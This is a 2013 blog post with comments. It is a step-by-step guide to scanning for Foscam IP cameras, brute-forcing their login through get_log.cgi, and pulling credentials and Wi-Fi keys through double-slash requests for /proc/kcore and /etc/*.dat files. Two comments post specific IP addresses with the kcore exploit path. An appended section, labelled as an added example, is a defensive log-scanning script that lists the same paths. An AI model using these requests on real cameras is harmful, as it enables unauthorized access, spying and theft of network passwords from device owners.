Tuesday, October 8, 2013

Scanning for Foscam cameras:

GET http://ipaddress:port/get_log.cgi HTTP/1.0
Accept: */*

Return: Netwave IP Camera

A response containing "Netwave IP Camera" identifies the host as a Foscam camera.


Cracking Foscam cameras:

GET http://ipaddress:port/get_log.cgi HTTP/1.0
Accept: */*
Authorization: Basic Base64Credentials

Return: 200 OK

A 200 OK response means the Base64Credentials were correct, so the Foscam camera has been cracked.


Exploits:

http://ipaddress:port//proc/kcore

The kernel dump is very much in the wild, but there are firmware updates that hide the credentials.

To check which ones you can't get:

GET http://ipaddress:port//etc/RT2870STA.dat
Accept: */*

Return: 200 OK

For any IP which sends back a 200 OK, you will not be able to see the credentials within kcore.

There is a catch, however. The data within RT2870STA.dat will hold the WPAPSK, which is the password for the camera, or it will hold the WEP security key. Either way it's a vulnerability.

RT2870STA.dat holds the WPAPSK. Half the time the username will be admin, or it will be the SSID or the alias name of the device. Keeping the data within RT2870STA.dat is important if you want a helping hand on gaining access.

Now there is an exploit that has not been discovered in the wild yet. This exploit deals with rt73sta.dat. This file will hold the WEP security key or the WPAPSK, like RT2870STA.dat.

GET http://ipaddress:port//etc/rt73sta.dat HTTP/1.0
Accept: */*

Return: 200 OK

You won't find this file as often as you would find RT2870STA.dat, and this is not a 100% working method. I tested 10 IP addresses, and within those 10, 7 worked.

Now, how this works:

Once we find an IP address with rt73sta.dat:

You will want to go to a forum or any blog that allows you to preview your post.


Once you have one, post http://ipaddress:port//proc/kcore as a preview, then right click, Save As, and save it as anyword.txt. This is to download the dump rather than stream it.

The file will never fully download. So once you see it stop, find your .txt, copy it, and make a second copy of it. The reason is, a lot of the time if you cancel your download the file will disappear, so we need a backup.

Open the .txt and go to Edit, Find...

Search for the device's title, meaning the title at the top left-hand side of the login URL which says Device(Name you want to search for). If it pops up, you've done it. You will see the username and password in plain text.


So a lot of the time rt73sta.dat goes hand in hand with kcore. Remember, this is not a 100% method.


There is also another method to see if kcore is worth checking out. This method is finding an IP with neither of the files. If you get a 404 on both, you have a chance of seeing the username and password by doing the same method as for rt73sta.dat, but this method is even rarer, like 1 out of 50.
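As an added example (not from the original post, and not Foscam's own code), here is a Python script a camera owner or network administrator could run over HTTP access logs in front of a camera (for example from a reverse proxy or a packet capture converted to log lines; the camera's own logging format is not assumed) to spot the three patterns described above: repeated failed logins against get_log.cgi, a success right after them, and double-slash requests for /proc/kcore, /etc/RT2870STA.dat or /etc/rt73sta.dat. The combined-style log format, the threshold and the sample lines are constructed; the paths and endpoint come from the post.

```python
"""Detect the Foscam probing patterns described in the post in HTTP access logs.

Added example, not from the original post. The log format (Apache/nginx style)
is an assumption; the sample lines are constructed and use documentation IPs.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Access-log line: client IP, ident, user, [timestamp], "METHOD PATH PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Files the post says are exposed through a double-slash ("//proc/kcore") request
SENSITIVE_FILES = {"/proc/kcore", "/etc/RT2870STA.dat", "/etc/rt73sta.dat"}
# Endpoint the post uses both to fingerprint the device and to test credentials
AUTH_ENDPOINT = "/get_log.cgi"

# Constructed sample log: one client guessing credentials, one reading files, one normal visitor
SAMPLE_LOG = """\
203.0.113.5 - - [08/Oct/2013:10:00:01 +0000] "GET /get_log.cgi HTTP/1.0" 401 0
203.0.113.5 - - [08/Oct/2013:10:00:02 +0000] "GET /get_log.cgi HTTP/1.0" 401 0
203.0.113.5 - - [08/Oct/2013:10:00:03 +0000] "GET /get_log.cgi HTTP/1.0" 401 0
203.0.113.5 - - [08/Oct/2013:10:00:04 +0000] "GET /get_log.cgi HTTP/1.0" 401 0
203.0.113.5 - - [08/Oct/2013:10:00:05 +0000] "GET /get_log.cgi HTTP/1.0" 401 0
203.0.113.5 - - [08/Oct/2013:10:00:06 +0000] "GET /get_log.cgi HTTP/1.0" 200 1532
198.51.100.7 - - [08/Oct/2013:10:05:00 +0000] "GET //proc/kcore HTTP/1.0" 200 4194304
198.51.100.7 - - [08/Oct/2013:10:05:01 +0000] "GET //etc/RT2870STA.dat HTTP/1.0" 200 2048
198.51.100.7 - - [08/Oct/2013:10:05:02 +0000] "GET //etc/rt73sta.dat HTTP/1.0" 404 0
192.0.2.9 - - [08/Oct/2013:10:06:00 +0000] "GET / HTTP/1.1" 200 812
""".splitlines()


def parse_line(line):
    """Return a dict with ip, ts, method, path, status (int), size; None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def normalize_path(path):
    """Strip the query string, decode %XX escapes, and collapse runs of slashes,
    so "//proc/kcore" and "/%2Fproc/kcore" both compare equal to "/proc/kcore"."""
    path = unquote(path.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path)


def analyze(lines, brute_threshold=5):
    """Scan log lines in order and return a list of alert dicts."""
    failures = defaultdict(int)  # client IP -> count of 401s on the auth endpoint
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines instead of aborting the whole run
        path = normalize_path(rec["path"])
        if path in SENSITIVE_FILES:
            alerts.append({
                "type": "file_disclosure_attempt",
                "ip": rec["ip"],
                "path": path,
                "served": rec["status"] == 200,  # 200 means the file actually left the device
            })
        elif path == AUTH_ENDPOINT:
            if rec["status"] == 401:
                failures[rec["ip"]] += 1
                if failures[rec["ip"]] == brute_threshold:
                    alerts.append({"type": "auth_brute_force", "ip": rec["ip"],
                                   "failures": brute_threshold})
            elif rec["status"] == 200 and failures[rec["ip"]] >= brute_threshold:
                # A success right after a run of failures is the highest-priority signal
                alerts.append({"type": "auth_success_after_failures", "ip": rec["ip"],
                               "failures": failures[rec["ip"]]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Feed it a real log with `analyze(open("access.log"))` and pipe the alerts into whatever your monitoring uses; a "served": True disclosure alert for any of the three files means the camera firmware is vulnerable and its credentials and Wi-Fi key should be treated as compromised.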

5 comments:

Anonymous said...
This comment has been removed by a blog administrator.
Unknown said...

Where do I enter the first statement? The Get ... etc. ?

Anonymous said...

http://151.227.86.125//proc/kcore

Anonymous said...

http://92.234.134.178:1234//proc/kcore

Anonymous said...

GET http://ipaddress:port/get_log.cgi HTTP/1.0
Accept: */*
Authorization: Basic Base64Credentials

Return: 200 OK

This will result in cracking a Foscam camera with the right Base64Credentials

what does this mean? GET and Accept
